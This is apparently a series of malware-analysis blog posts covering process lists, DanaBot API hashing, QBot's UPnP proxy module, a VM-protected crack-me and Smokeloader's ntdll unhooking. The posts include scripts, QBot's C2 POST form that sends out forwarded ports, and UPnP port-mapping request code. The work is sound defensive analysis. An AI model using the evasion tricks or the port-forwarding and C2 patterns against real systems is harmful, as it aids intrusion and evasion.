Linux/Windows Internals - Process structures
Having an overview of the running processes on the operating system is something we usually take for granted. We can't think of working without fundamental features like that.
But how does the kernel keep track of the processes that are currently running? Today, we take a look at the corresponding structures on Windows and Linux, which are responsible for keeping track of the running processes.
Linux - Task structures
If you ever used Linux before, you are probably familiar with the ps
command, which allows you to print the list of all processes currently running on the system. We will dive into how the Linux kernel keeps track of these processes internally.
The kernel stores the processes in a doubly linked list called the task list. Each node in this list is a process descriptor of the type task_struct. The definition of task_struct can be found in linux/sched.h[1] of Linus Torvalds' git repository.

If you checked out the code, you will realise that this structure is pretty extensive, and we will not dive into every member of it. Our focus lies on understanding how the kernel handles this task list. As I've already explained, the kernel keeps track of all processes with a doubly linked list. Each task structure holds a member tasks of type list_head.
struct list_head { struct list_head *next, *prev; };
As you've probably already guessed, the next pointer holds a reference that allows us to retrieve the next task_struct, and the prev field allows us to take a step back. We can write a simple Linux kernel module to iterate through the task list and print out all process names and process ids on the current system:
Iterating through the linked list
Task structures lie in kernel space, so accessing them is not possible without writing a kernel module. The code is pretty straightforward. We use init_task as the initial entry point, which is the idle task running on the Linux system. Iterating through the linked list is possible via the next_task macro. Then we use the printk function to log the comm (process executable) member and the process id.
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/rcupdate.h>
#include <linux/sched/signal.h>
#include <linux/sched/task.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Andreas Klopsch");
MODULE_DESCRIPTION("Simple module for printing task structure members");
MODULE_VERSION("0.1");

static int __init action_init(void)
{
    /* init_task (declared in linux/sched/task.h) is the top element of the task list */
    struct task_struct *task;

    printk(KERN_INFO "Init task = %s\n", init_task.comm);
    printk(KERN_INFO "Getting next task\n");

    /* Hold the RCU read lock so that entries are not freed while we walk the list */
    rcu_read_lock();
    /* Work with pointers: a task_struct is far too large to copy onto the kernel stack */
    for (task = next_task(&init_task); task != &init_task; task = next_task(task))
        printk(KERN_INFO "Comm = %s pid = %d\n", task->comm, task->pid);
    rcu_read_unlock();

    return 0;
}

static void __exit action_exit(void)
{
    printk(KERN_INFO "Stopping task iterator\n");
}

module_init(action_init);
module_exit(action_exit);
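User space cannot touch task_struct directly, but the kernel exposes the same two values, comm and pid, through the /proc filesystem. As a cross-check for the module output, the sketch below reads them from there; the function name and the `proc_root` parameter are illustrative, and the code assumes a mounted procfs.

```python
import os


def list_processes(proc_root="/proc"):
    """Return sorted (pid, comm) pairs for every process below proc_root."""
    processes = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue  # skip non-process entries such as "self" or "meminfo"
        try:
            with open(os.path.join(proc_root, entry, "comm")) as handle:
                comm = handle.read().strip()
        except OSError:
            continue  # the process exited while we were iterating
        processes.append((int(entry), comm))
    return sorted(processes)


if __name__ == "__main__":
    for pid, comm in list_processes():
        print(f"Comm = {comm} pid = {pid}")
```

Unlike the kernel module, this view only contains what the kernel decides to show, which is exactly why rootkits that unlink a task from the list are interesting to compare against it.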

Windows - EPROCESS
On Windows, there are similarities with Linux. Each process on Windows is represented by an EPROCESS
structure, which is actually the representation of a process object. The EPROCESS
structure also contains a KPROCESS
structure, which holds information for the kernel.
As with Linux, this block contains various information relating to the corresponding process, like:
- Virtual Address Descriptors, holding the map of the process virtual memory
- Process ID
- Image base name
Another similarity with Linux is the way the processes are linked with each other. EPROCESS structures are connected to each other via a doubly linked list called ActiveProcessLinks. The next process in the list is referenced by the Flink pointer and the previous process object is referenced by the Blink pointer. Enumerating the processes can therefore again be implemented by iterating through the ActiveProcessLinks list.

References
- Windows Internals, Part 1: System Architecture, Processes, Threads, Memory Management, and More
- Mastering Malware Analysis: The complete malware analyst's guide to combating malicious software, APT, cybercrime, and IoT attacks
Deobfuscating DanaBot's API Hashing
You probably already guessed it from the title: API Hashing is used to obfuscate a binary in order to hide API names from static analysis tools, which makes it harder for a reverse engineer to understand the malware's functionality.
A first approach to getting an idea of an executable's functionality is to more or less dive through the functions and look out for API calls. If, for example, the CreateFileW function is called in a specific subroutine, it probably means that the cross references or the routine itself implement some file handling functionality. This won't be possible if API Hashing is used.
Instead of calling the function directly, each API call has a corresponding checksum/hash. A hardcoded hash value is retrieved and a checksum is computed for each library function. If the computed value matches the hash value we compare it against, we have found our target.
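The lookup itself, and the analyst's counter-move, fit into a few lines. In this sketch CRC32 is only a stand-in for whatever checksum a sample really uses, the export list is a tiny hand-picked example, and the function names are hypothetical.

```python
import zlib


def checksum(name):
    """Stand-in checksum (CRC32); real samples use their own routine."""
    return zlib.crc32(name.encode("ascii"))


def resolve(target_hash, export_names):
    """What the malware does: hash every export until one matches."""
    for name in export_names:
        if checksum(name) == target_hash:
            return name
    return None


def build_lookup(export_names):
    """What the analyst does: precompute a hash -> name table once."""
    return {checksum(name): name for name in export_names}


if __name__ == "__main__":
    exports = ["CreateFileW", "ReadFile", "WriteFile", "CloseHandle"]
    hardcoded = checksum("CreateFileW")   # the constant found in the binary
    print(resolve(hardcoded, exports))
    print(build_lookup(exports)[hardcoded])
```

With the lookup table, every hash constant in the disassembly can be annotated with the API name it stands for.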

In this case a reverse engineer needs to choose a different path to analyse the binary or deobfuscate it. This blog article will cover how the DanaBot banking trojan implements API Hashing and possibly the easiest way on how this can be defeated. The SHA256
of the binary I am dissecting here is added at the end of this blog post.
Deep diving into DanaBot
DanaBot itself is a banking trojan that has been around since at least 2018 and was first discovered by ESET[1]. It is worth mentioning that it implements most of its functionality in plugins, which are downloaded from the C2 server. I will focus on deobfuscating API Hashing in the first stage of DanaBot, a DLL which is dropped and persisted on the system and is used to download further plugins.
Reversing the ResolvFuncHash routine
At the beginning of the function, the EAX
register stores a pointer to the DOS
header of the Dynamic Link Library that contains the function the binary wants to call. The corresponding hash of the yet unknown API function is stored in the EDX
register. The routine also contains a pile of junk instructions that obscure its actual purpose.
The hash is computed solely from the function name, so the first step is to get a pointer to all function names of the target library. Each DLL contains a table with all exported functions, which are loaded into memory. This Export Directory is always the first entry in the Data Directory array. The PE file format and its headers contain enough information to reach this mentioned directory by parsing header structures:
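The header walk mentioned above can be sketched as follows. This is a minimal parser over raw PE bytes that follows the documented PE layout (e_lfanew at offset 0x3C, Data Directory at offset 96 or 112 of the optional header); the function name is my own and the sketch does not reproduce DanaBot's routine.

```python
import struct


def export_directory_entry(image):
    """Return (rva, size) of the Export Directory from raw PE bytes."""
    if image[:2] != b"MZ":
        raise ValueError("missing DOS header")
    # e_lfanew at offset 0x3C points to the NT headers ("PE\0\0").
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # Signature (4 bytes) + IMAGE_FILE_HEADER (20 bytes) precede the optional header.
    opt = e_lfanew + 4 + 20
    (magic,) = struct.unpack_from("<H", image, opt)
    # The Data Directory starts at offset 96 (PE32) or 112 (PE32+).
    if magic == 0x10B:
        data_dir = opt + 96
    elif magic == 0x20B:
        data_dir = opt + 112
    else:
        raise ValueError("unknown optional header magic")
    # Entry 0 of the Data Directory is the Export Directory: RVA, then size.
    return struct.unpack_from("<II", image, data_dir)
```

From the returned RVA, the export directory's name table can then be walked to obtain every exported function name.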

In the picture below, you can see an example of the mentioned junk instructions, as well as the critical block, which compares the computed hash with the checksum of the function we want to call. The routine iterates through all function names in the Export Directory and calculates the hash.
The loop breaks once the computed hash matches the value that has been stored in the EDX
register since the beginning of this routine.

Reversing the hashing algorithm
The hashing algorithm itself is fairly simple. It is the junk instructions and opaque predicates that complicate the process of reversing this routine.
The algorithm takes the nth
and the stringLength-n-1th
char of the function name and stores them, as well as capitalised versions into memory, resulting in a total of 4 characters. Each one of those characters is XOR'd
with the string length. Finally they are multiplied, and the results are accumulated on each loop iteration to form the hash value.
def get_hash(funcname):
    """Calculate the hash value for function name. Return hash value as integer"""
    strlen = len(funcname)
    # if the length is even, we encounter a different behaviour
    i = 0
    hashv = 0x0
    while i < strlen:
        if i == (strlen - 1):
            ch1 = funcname[0]
        else:
            ch1 = funcname[strlen - 2 - i]
        # init first character and capitalize it
        ch = funcname[i]
        uc_ch = ch.capitalize()
        # Capitalize the second character
        uc_ch1 = ch1.capitalize()
        # Calculate all XOR values
        xor_ch = ord(ch) ^ strlen
        xor_uc_ch = ord(uc_ch) ^ strlen
        xor_ch1 = ord(ch1) ^ strlen
        xor_uc_ch1 = ord(uc_ch1) ^ strlen
        # do the multiplication and XOR again with upper case character1
        hashv += ((xor_ch * xor_ch1) * xor_uc_ch)
        hashv = hashv ^ xor_uc_ch1
        i += 1
    return hashv
A Python script for calculating the hash for a given function name is also uploaded on my GitHub page[2] and free for everyone to use. I've also uploaded a text file with hashes for exported functions of commonly used DLLs.
Deobfuscation by Commenting
Now that we have cracked the algorithm, we want to update our disassembly so that we know which hash value represents which function. As I've already mentioned, we want to focus on simplicity. The easiest way is to compute hash values for exported functions of commonly used DLLs and write them into a file.
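Generating and re-reading such a file could look like the sketch below. The one-pair-per-line file format, `placeholder_hash` and `parse_table` are assumptions made for illustration; `parse_table` is only a hypothetical stand-in for the `get_api_table` helper used later, whose real implementation is not shown in this article.

```python
def build_hash_table(export_names, hash_fn):
    """Map hex(hash) -> export name for every given name."""
    return {hex(hash_fn(name)): name for name in export_names}


def dump_table(table):
    """Serialise the table as 'hash name' lines (assumed file format)."""
    return "\n".join("%s %s" % (h, name) for h, name in sorted(table.items()))


def parse_table(lines):
    """Hypothetical stand-in for get_api_table(): rebuild the dict from lines."""
    table = {}
    for line in lines:
        line = line.strip()
        if line:
            hashv, name = line.split(" ", 1)
            table[hashv] = name
    return table


def placeholder_hash(name):
    # Stand-in for get_hash(); swap in the real routine when generating the file.
    return sum(ord(c) for c in name)


names = ["CreateFileW", "ReadFile", "CloseHandle"]
table = build_hash_table(names, placeholder_hash)
restored = parse_table(dump_table(table).splitlines())
```

Keying the table by the hex string keeps the later lookup trivial, because the immediate read from the disassembly only needs to be normalised to the same textual form.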

With this file, we can write an IDAPython
script to comment the library function name next to the API Hashing call. Luckily the API Hashing function is always called with the same pattern:
- Move the wanted hash value into the EDX register
- Move a DWORD into the EAX register
First we retrieve all XRefs
of the API Hashing function. Each XRef
contains an address at which the API Hashing function is called, which means that we will find the mentioned pattern within roughly the 5 preceding instructions. So we fetch the previous instruction until we extract the wanted hash value, which is being moved into EDX
. Finally we can use this immediate to look up the corresponding API function in the hash values we have generated before and comment the function name next to the XRef
address.
# Python 2 script for the pre-7.x IDAPython API
import idautils
import idc
from idc import GetMnem, GetOpnd, PrevHead


def add_comment(addr, hashv, api_table):
    """Write a comment at addr with the matching api function.
    Return True if a corresponding api hash was found."""
    # remove the "h" at the end of the string
    hashv = hex(int(hashv[:-1], 16))
    keys = api_table.keys()
    if hashv in keys:
        apifunc = api_table[hashv]
        print "Found ApiFunction = %s. Adding comment." % (apifunc,)
        idc.MakeComm(addr, apifunc)
        comment_added = True
    else:
        print "Api function for hash = %s not found" % (hashv,)
        comment_added = False
    return comment_added


def main():
    """Main"""
    f = open(
        "C:\\Users\\luffy\\Desktop\\Danabot\\05-07-2020\\Utils\\danabot_hash_table.txt",
        "r")
    lines = f.readlines()
    f.close()
    # get_api_table() is not shown here; it turns the lines into a dict hash -> name
    api_table = get_api_table(lines)
    i = 0
    ii = 0
    for xref in idautils.XrefsTo(0x2f2858):
        i += 1
        currentaddr = xref.frm
        addr_minus = currentaddr - 0x10
        while currentaddr >= addr_minus:
            currentaddr = PrevHead(currentaddr)
            is_mov = GetMnem(currentaddr) == "mov"
            if is_mov:
                dst_is_edx = GetOpnd(currentaddr, 0) == "edx"
                # needs to be edx register to match pattern
                if dst_is_edx:
                    src = GetOpnd(currentaddr, 1)
                    # immediate always ends with 'h' in IDA
                    if src.endswith("h"):
                        add_comment(xref.frm, src, api_table)
                        ii += 1
    print "Total xrefs found %d" % (i,)
    print "Total api hash functions deobfuscated %d" % (ii,)


if __name__ == '__main__':
    main()
Conclusion
As reverse engineers, we will probably continue to encounter API Hashing in various forms. I hope I was able to show you a quick and dirty method, or at least give you some foundation on how to beat this obfuscation technique. I also hope that the next time a blue team fellow has to analyse DanaBot, this article comes in handy and saves them some time reverse engineering this banking trojan.
IoCs
- Dropper =
e444e98ee06dc0e26cae8aa57a0cddab7b050db22d3002bd2b0da47d4fd5d78c
- DLL =
cde01a2eeb558545c57d5c71c75e9a3b70d71ea6bbeda790a0b871fcb1b76f49
UPnP - Messing up Security for years
UPnP is a set of networking protocols that permits network devices to discover each other's presence on a network and establish services for various functionalities.
Too lazy to set up port forwarding yourself? Just enable UPnP to automatically establish working configurations with devices! Dynamic device configuration like this certainly makes our life more comfortable. Sadly, it also comes with many security issues.
In this blog article I walk through the stages of the UPnP protocol, give a quick introduction to security issues regarding UPnP and show how QBot abuses the UPnP protocol to turn devices into proxy C2 servers.
UPnP in a nutshell
UPnP makes use of common networking protocols and stacks HTTP
, SOAP
and XML
on top of the IP
protocol in order to provide a variety of functionalities for users. Without going too deep into how UPnP works in detail, the following figure is enough for the basics.

Some services a node with UPnP enabled can offer (it really depends on the device):
- Port forwarding
- Switching power on and off for light bulbs
- etc.
This is very high level of course. If you are interested in everything about UPnP, I recommend Wikipedia[1] for a high level introduction or this report, which goes into more detail[2].
For the rest of this blog article, only the first three stages are really relevant.
IoT Security and UPnP
Misconfiguration
Again, while it might be very convenient for customers to have devices autoconfigure themselves, it leads to huge security risks.
Many routers have UPnP enabled by default. Think of a misconfigured IoT device that sends a command to forward a specific port, exposing that port to the internet.
It is known that many IoT devices contain awful security flaws like default credentials for telnet. If such a device is misconfigured and exposes its telnet port to the outside, it probably takes about 5 minutes until some script kiddie adds it to their botnet.
Exploitation
A blog post from TrendMicro[3] previously mentioned that many devices still use very old UPnP libraries which are not up to date with current security standards. This gives attackers a larger attack surface. The newest example is CallStranger
.

It is caused by the Callback header value in the UPnP SUBSCRIBE function. This field can be controlled by an attacker and enables a Server Side Request Forgery
like vulnerability. It can be used for the following malicious purposes:
- Exfiltrate data
- Scan networks
- Force nodes to participate in DDoS attacks
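From the defender's side, the core of the problem is that the Callback value is accepted without checking where it points. The following is only a sketch of one possible check, assuming the header carries one or more URLs in angle brackets; the function name and the policy of rejecting host names are my own choices, not part of any UPnP library.

```python
import ipaddress
import re
from urllib.parse import urlparse


def callback_stays_local(callback_header, local_network):
    """Return True only if every Callback URL targets an IP inside local_network."""
    network = ipaddress.ip_network(local_network)
    urls = re.findall(r"<([^>]+)>", callback_header)
    if not urls:
        return False
    for url in urls:
        host = urlparse(url).hostname
        if host is None:
            return False
        try:
            address = ipaddress.ip_address(host)
        except ValueError:
            # Host names are rejected because they could resolve anywhere.
            return False
        if address not in network:
            return False
    return True


print(callback_stays_local("<http://192.168.1.5:8080/cb>", "192.168.1.0/24"))
print(callback_stays_local("<http://8.8.8.8/collect>", "192.168.1.0/24"))
```

A device that refuses subscriptions failing such a check can no longer be pointed at arbitrary hosts on the internet.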
I recommend visiting the official domain[4] of this vulnerability if you want to learn more about it.
UPnP abused by QBot
Security risks created by UPnP are of course not limited to the IoT landscape.
Another way to use UPnP maliciously is to install proxy C2 servers on devices which have the protocol enabled, as QBot does for example. Let's take a look at how this is done.
Diving into QBot's UPnP proxy module
This technique was first discovered by McAfee[4] in 2017. First QBot starts scanning for devices which have UPnP enabled and match one of the following device or service types:
- urn:schemas-upnp-org:device:InternetGatewayDevice:1
- urn:schemas-upnp-org:service:WANIPConnection:1
- urn:schemas-upnp-org:service:WANPPPConnection:1
- upnp:rootdevice
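Discovery of these types happens over SSDP, where the type goes into the ST header of an M-SEARCH request sent to the multicast address 239.255.255.250:1900. The sketch below builds such requests for the four search targets listed above; it is a generic SSDP example for lab use (for instance against a fake SSDP service), not a reconstruction of QBot's code, and the helper names are hypothetical.

```python
import socket

SSDP_ADDR = "239.255.255.250"
SSDP_PORT = 1900

SEARCH_TARGETS = [
    "urn:schemas-upnp-org:device:InternetGatewayDevice:1",
    "urn:schemas-upnp-org:service:WANIPConnection:1",
    "urn:schemas-upnp-org:service:WANPPPConnection:1",
    "upnp:rootdevice",
]


def build_msearch(search_target, mx=2):
    """Build the raw bytes of an SSDP M-SEARCH request for one search target."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        "HOST: %s:%d" % (SSDP_ADDR, SSDP_PORT),
        'MAN: "ssdp:discover"',
        "MX: %d" % mx,
        "ST: %s" % search_target,
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def discover(search_target, timeout=2.0):
    """Send one M-SEARCH and collect raw responses until the timeout expires."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    responses = []
    try:
        sock.sendto(build_msearch(search_target), (SSDP_ADDR, SSDP_PORT))
        while True:
            data, addr = sock.recvfrom(4096)
            responses.append((addr, data))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return responses


requests = [build_msearch(target) for target in SEARCH_TARGETS]
```

Each response carries a LOCATION header that points to the device description, which is what gets fetched in the next step.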

If you are using INetSim for malware analysis, you will probably notice that it does not offer any functionality to fake an SSDP or UPnP service. However, we can use this Python script[5] by user GrahamCobb, which emulates a fake SSDP service, and adjust the device description to suit our needs.
Once devices are discovered, QBot requests their device descriptions and checks whether it is dealing with an internet gateway device. This can be determined by looking at the device description itself.

If it is an internet gateway device, QBot confirms that a connection exists by sending a GetStatusInfo
command, followed by retrieving the external IP address of this device with the GetExternalIPAddress
command.
Next it tries to use the AddPortMapping
command to add port forwarding rules to the device.
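These commands are SOAP actions that are POSTed to the control URL taken from the device description. As a rough sketch, a request for the WANIPConnection service can be assembled as shown below; the helper name and the example values (port 8080, client 192.168.1.10) are made up, and nothing is sent over the network.

```python
from xml.sax.saxutils import escape

WAN_IP_SERVICE = "urn:schemas-upnp-org:service:WANIPConnection:1"


def build_soap_request(action, arguments, service_type=WAN_IP_SERVICE):
    """Return (headers, body) for a UPnP SOAP action with ordered arguments."""
    args_xml = "".join(
        "<{0}>{1}</{0}>".format(name, escape(str(value)))
        for name, value in arguments
    )
    body = (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:{0} xmlns:u="{1}">{2}</u:{0}></s:Body>'
        "</s:Envelope>"
    ).format(action, service_type, args_xml)
    headers = {
        "Content-Type": 'text/xml; charset="utf-8"',
        "SOAPAction": '"%s#%s"' % (service_type, action),
    }
    return headers, body


# Example values are placeholders for a lab setup.
mapping = [
    ("NewRemoteHost", ""),
    ("NewExternalPort", 8080),
    ("NewProtocol", "TCP"),
    ("NewInternalPort", 8080),
    ("NewInternalClient", "192.168.1.10"),
    ("NewEnabled", 1),
    ("NewPortMappingDescription", "example"),
    ("NewLeaseDuration", 0),
]
headers, body = build_soap_request("AddPortMapping", mapping)
```

GetStatusInfo and GetExternalIPAddress take no input arguments, so the same helper can be called with an empty argument list for them.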

Afterwards all rules are removed again and the ports which were successfully forwarded are sent as an HTTP-POST
to the C2 server.
The carrier protocol is HTTPS
and the request is sent in the following form:
# destination address
https://[HARDCODED_IP]:[HARDCODED_PORT]/bot_serv
# POST DATA form, successful port forwarded ports are appended to ports
cmd=1&msg=%s&ports=
My analysis stopped at this point for now. However, McAfee explains that a new binary is downloaded from the contacted C2 server, which re-adds the port forwarding rules and is responsible for the C2 communication. The blog article I've referenced above explains the whole functionality, so I recommend taking a look at it if you are interested in the next steps.
Final Words
As you can see, UPnP comes with many security flaws and can lead to a compromised network. If you have UPnP enabled in your company's network, I really recommend checking whether it is needed and turning it off if it is not.
Exams at university are coming up next, so it will probably take some time until I can get my hands on the QBot C2 protocol or the proxy binary. I do, however, want to look at these two functionalities next.
Taming Virtual Machine Based Code Protection - 1
Overcoming obfuscation in binaries has always been an interesting topic for me, especially in combination with malware. Over the last weeks I've been playing around with Virtualised Code Protection in order to see how well I could handle it.
I decided to download a simple crack-me challenge which is obfuscated with this technique. It takes me some time to reverse everything, so there will be at least 2 blog articles about my little project.

Virtualised Code Protection
Each architecture has a defined instruction set. By looking up the instructions to the corresponding bytes, we are able to translate these bytes into disassembly. The unit that actually executes these bytes is the CPU.
Virtual machine based code protection emulates a processor and thus replaces our usual instruction set with a custom one. So in order to really understand what a virtual machine hardened binary is doing on a low level, we need to reverse the virtual machine first. This means we have to understand the custom instruction set.
I want to show you a practical example of what such a custom instruction can look like and how it can be discovered.
Practical Example
Preparing the virtual machine
The challenge demands a serial key and a username. Both of them need certain values for the serial key to be valid. After entering a username and a serial key, the lengths of both are checked first.

At the bottom of this routine, we can already spot 2 interesting functions and operations which push the success or failure message onto the stack.

The function InitialiseVM
is where it gets interesting for us. If you just look quickly through the disassembly in the figure below, you will see that there are multiple buffers allocated and static values written into an internal structure. Furthermore it is filled with function pointers. Each one of those functions represents a custom instruction. This routine is used to allocate the virtual address space our virtual machine will use for emulation, as well as a table to select custom instructions from.

Next is the CheckSerial
function, which implements the virtual machine loop that emulates the virtual processor unit.

In the block at loc_4015E5
the function sub_4013DF
is executed on each iteration. Afterwards the byte at the address that ESI+0x7C
points to is used to calculate the dynamic call at the end of the current block (call dword ptr [esi+eax*4+80h]
). In other words, this byte selects the function to enter and thereby decides which custom instruction is executed. Before we look at how some of the opcodes are actually parsed here, let's review what the virtualised address space of this VM looks like.
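The indirect call through a function table is the classic fetch and dispatch loop of an interpreter. A toy version in Python could look like this; the bytecode, the handler numbering and the two-byte instruction width are invented for the example and do not reflect the crack-me's real encoding.

```python
def run_vm(bytecode, handlers, max_steps=100):
    """Fetch one opcode byte per step and call the matching handler.

    A handler returns the number of bytes it consumed, or None to stop.
    Returns the final value of the virtual instruction pointer.
    """
    ip = 0
    steps = 0
    while ip < len(bytecode) and steps < max_steps:
        opcode = bytecode[ip]
        # Table lookup, comparable to call dword ptr [esi+eax*4+80h].
        consumed = handlers[opcode](bytecode, ip)
        if consumed is None:
            break
        ip += consumed
        steps += 1
    return ip


trace = []


def handler_3(bytecode, ip):
    # Hypothetical instruction: record the operand byte that follows the opcode.
    trace.append(bytecode[ip + 1])
    return 2


def handler_0(bytecode, ip):
    # Hypothetical instruction: stop the machine.
    return None


final_ip = run_vm(bytes([3, 0x41, 3, 0x42, 0]), {0: handler_0, 3: handler_3})
```

Reversing a protected binary then boils down to identifying each handler in the table and the operand format it expects.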

Executing custom instructions
The function sub_4013DF
is called on each iteration and reads bytes from the buffer which contains opcodes for custom instructions. The first one has a size of 5 bytes. Each of these bytes is used by the virtual machine to translate the opcode into a valid operation. At the time of writing this article, I have not fully explored this function yet. However, I am confident that the last 2 bytes of an instruction are used to influence registers.

Upon returning from this function, the program takes the first byte of the ESI+0x7C
structure and uses it to determine which function from the previously allocated function table is called. The first run returns EAX=3
, so we are dealing with the custom instruction with instruction id 3.
Let's jump into our first custom instruction.

The function sub_401271
has 31 XRefs and is used in every function from the function table. Before the function is called, the pointer at ESI+7C
, which points to our 0x24 byte buffer holding the custom opcodes, is retrieved. Then 0xC
is added, which means we are pointing at the byte at ESI+7C+0xC
, the start of the 4th DWORD
in this buffer.
The routine accesses the third byte of the current opcode and is responsible for determining the instruction type. The first four bits decide whether it is an instruction utilizing 2 registers, a memory read or a move of an immediate value into a register. The second four bits determine the size of the data that will be moved around. These 4 bits are zero extended into bytes.
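Splitting such a type byte into its two halves is a simple shift and mask. The sketch below assumes that "the first four bits" means the high nibble; the article does not state the bit order, so treat that as a guess.

```python
def decode_type_byte(value):
    """Split one byte into (high nibble, low nibble).

    Assumption: the high nibble is the operand kind and the low nibble
    is the operand size. The real bit order may be the other way round.
    """
    kind = (value >> 4) & 0xF
    size = value & 0xF
    return kind, size


kind, size = decode_type_byte(0x24)
print(kind, size)
```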

Take a look at the figure below. The result of our InstrType
function is saved in ebp+0x4
. Next the memory address which ESI+0x20
points at is decreased and filled with the value we just computed. Doesn't this look familiar? The stack pointer is also decreased when we push data onto the stack.

It seems that the custom instruction we just investigated is a custom PUSH
instruction. ESI+0x20
points to the virtual stack that is emulated by this virtual machine. Since the pointer at ESI+0x4C
is increased here after an instruction, it might hold the virtual instruction pointer.
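The behaviour of this virtual PUSH can be modelled with a byte array and a stack pointer that grows downwards. The slot width of 4 bytes and the stack size are assumptions for this sketch.

```python
import struct


class VirtualStack:
    """Toy model of a downward-growing stack, like the one behind ESI+0x20."""

    def __init__(self, size=0x100):
        self.memory = bytearray(size)
        self.sp = size  # starts one past the end, like an empty hardware stack

    def push(self, value):
        # Decrease the stack pointer first, then store the value there.
        self.sp -= 4
        struct.pack_into("<I", self.memory, self.sp, value & 0xFFFFFFFF)

    def pop(self):
        (value,) = struct.unpack_from("<I", self.memory, self.sp)
        self.sp += 4
        return value


stack = VirtualStack(16)
stack.push(0x11223344)
```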
So far we have figured out what the first 3 bytes of an opcode do and we have an idea what the last 2 are responsible for. To give a proper answer on how they are used, we need to look at more than just one virtual instruction execution.

Conclusion
So it just took me a complete blog article to really explain how to reverse a single custom instruction of a binary hardened with Virtualised Code Protection ;-). As you can see, this kind of software protection is very powerful.
I will finish this challenge for sure and will write a second blog article about how I solved it.
Examining Smokeloader's Anti Hooking technique
Hooking is a technique to intercept function calls, messages or events passed between software components, or in this case malware. The technique can be used for malicious as well as defensive purposes.
Rootkits, for example, can hook API calls to hide themselves from analysis tools, while we as defenders can use hooking to learn more about malware or to build detection mechanisms that protect customers.
Cybersecurity continues to be a game of cat and mouse, and while we try to build protections, blackhats will always try to bypass them. Today I want to show you how SmokeLoader bypasses hooks on ntdll.dll
and how Frida can be used to hook library functions.
The bypass was already explained in a blog article from Checkpoint[1] written by Israel Gubi. It covers a lot more than I do regarding Smokeloader, so it is definitely worth reading too.
Hooking with Frida
If you've read my previous blog articles about QBot, you are familiar with the process iteration and AV detection[3]. It iterates over processes and compares each process name with entries in a black list containing process names of common AV products. If one process name matches an entry, QBot quits its execution.
Frida is a Dynamic Instrumentation Toolkit which can be used to write dynamic analysis scripts in high level languages, in this case JavaScript. If you want to know more about this technology, I advise you to visit this website[4] and read its documentation.
We can write a small Frida script to hook the lstrcmpiA
function in order to investigate which process names are in the black list.
import sys

import frida


def main():
    """Main."""
    # argv[1] is our malware sample
    pid = frida.spawn(sys.argv[1])
    sess = frida.attach(pid)
    script = sess.create_script("""
        console.log("[+] Starting Frida script")
        var lstrcmpiA = ptr("0x76B43E8E")
        console.log("[+] Hooking lstrcmpiA at " + lstrcmpiA)
        Interceptor.attach(lstrcmpiA, {
            onEnter: function(args) {
                console.log("[+][+] Called lstrcmpiA");
                console.log("[+][+] Arg1Addr = " + args[0]);
                console.log("[+][+] Buffer");
                pretty_print(args[0], 0x30);
                console.log("[+][+] Arg2Addr = " + args[1]);
                console.log("[+][+] Buffer");
                pretty_print(args[1], 0x30);
            },
            onLeave: function(retval) {
                console.log("[+][+] Returned from lstrcmpiA")
            }
        });
        function pretty_print(addr, sz) {
            var bufptr = ptr(addr);
            var bytearr = Memory.readByteArray(bufptr, sz);
            console.log(bytearr);
        };
    """)
    script.load()
    frida.resume(pid)
    sys.stdin.read()
    sess.detach()


if __name__ == "__main__":
    main()
We attach to the malicious process and hook the lstrcmpiA
function at a static address. When analysing malware, we have (most of the time) the privilege to control and adjust our environment as much as we want. If you turn off ASLR
and use snapshots, using Frida with static pointers is pretty convenient, because most functions will always have the same address. However, it's also possible to calculate the addresses dynamically. lstrcmpiA
has 2 arguments, which are both pointers of type LPCSTR
. So we just resolve the pointers, read 0x30
bytes starting at each pointer address into a ByteArray and print it.
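For the dynamic variant, the address can be resolved inside the injected JavaScript instead of being hardcoded. The helper below only builds that script text; `build_hook_script` is a name I made up, and the JavaScript calls (`Process.getModuleByName`, `getExportByName`, `readCString`) follow my reading of recent Frida documentation, so older releases may need `Module.findExportByName(module, name)` instead.

```python
def build_hook_script(module_name, export_name):
    """Return Frida JavaScript that resolves an export at runtime and hooks it."""
    return """
var target = Process.getModuleByName("%s").getExportByName("%s");
console.log("[+] Hooking %s at " + target);
Interceptor.attach(target, {
    onEnter: function (args) {
        console.log("[+] Arg1 = " + args[0].readCString());
        console.log("[+] Arg2 = " + args[1].readCString());
    }
});
""" % (module_name, export_name, export_name)


source = build_hook_script("kernel32.dll", "lstrcmpiA")
```

The resulting string can be passed to `create_script()` in place of the script with the static pointer, which makes the hook independent of ASLR and of the Windows build in the analysis VM.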

Smokeloader's Anti Hooking technique
So how does Smokeloader bypass hooks? Well, it can do so at least for the ntdll.dll
library. During execution Smokeloader retrieves the Temp folder path and generates a random name. If a file with the generated name already exists in the temp folder, it is deleted with DeleteFileW
.

Next the original ntdll.dll
file is copied from system32
to the temp folder with the exact name it just generated. This leads to a copy of this mentioned library being placed in the temp directory.


Instead of loading the real ntdll.dll
file, the copy is loaded into memory by calling LdrLoadDll
.

Most AV vendors, as well as analysts, have probably implemented their hooks on the original ntdll.dll
, so calls that go through the copied ntdll.dll
file will be missed.
Smokeloader continues to call functions from this copied DLL, for example NtQueryInformationProcess
to detect whether a debugger is attached to it.
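One way a defender could spot this trick is to look for files that are byte-identical to the system ntdll.dll but live under a different path. The sketch below compares SHA256 digests; the demo uses stand-in files in a temporary directory, and on a real system the candidate list would have to come from the modules loaded into the suspicious process, which is not covered here.

```python
import hashlib
import os
import tempfile


def sha256_of(path):
    """Return the SHA256 hex digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_identical_copies(reference_path, candidate_paths):
    """Return candidates with the same content as the reference but another path."""
    reference = sha256_of(reference_path)
    return [
        path for path in candidate_paths
        if path != reference_path and sha256_of(path) == reference
    ]


# Demo with stand-in files instead of the real system32 and temp folders.
workdir = tempfile.mkdtemp()
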